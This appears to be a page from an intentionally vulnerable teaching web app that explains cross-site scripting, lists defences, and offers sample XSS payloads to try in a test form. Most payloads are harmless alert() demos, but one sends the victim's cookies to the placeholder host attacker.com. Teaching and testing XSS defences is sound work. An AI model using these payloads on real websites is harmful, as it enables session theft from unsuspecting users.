XSS Demo - WebAppRazor

XSS (Cross-Site Scripting) Demo

Cross-Site Scripting (XSS) occurs when an application includes untrusted data in a web page without proper validation or escaping, allowing attackers to execute scripts in other users' browsers.

Types of XSS:

Reflected XSS: Script reflected back from user input
Stored XSS: Script stored in database and executed later
DOM-based XSS: Client-side script manipulation

Try These XSS Payloads:

            # Basic alert
            <script>alert('XSS')</script>
            
            # Cookie stealing
            <script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
            
            # Image with onerror
            <img src="x" onerror="alert('XSS')">
            
            # SVG payload  
            <svg onload="alert('XSS')">
            
            # Event handlers
            <body onload="alert('XSS')">
            <div onmouseover="alert('XSS')">Hover me</div>
            
            # JavaScript protocol
            <a href="javascript:alert('XSS')">Click me</a>
            
            # Iframe injection
            <iframe src="javascript:alert('XSS')"></iframe>
        

XSS Prevention Methods:

HTML Encoding: Encode user input for HTML context
Attribute Encoding: Encode for HTML attributes
JavaScript Encoding: Encode for JavaScript context
CSS Encoding: Encode for CSS context
Content Security Policy (CSP): Restrict script sources
Input Validation: Whitelist allowed input

XSS Vulnerability Test

Error:

Please enter a message.

XSS (Cross-Site Scripting) Demo

What is XSS?

Types of XSS:

Try These XSS Payloads:

XSS Prevention Methods:

XSS Vulnerability Test

Error: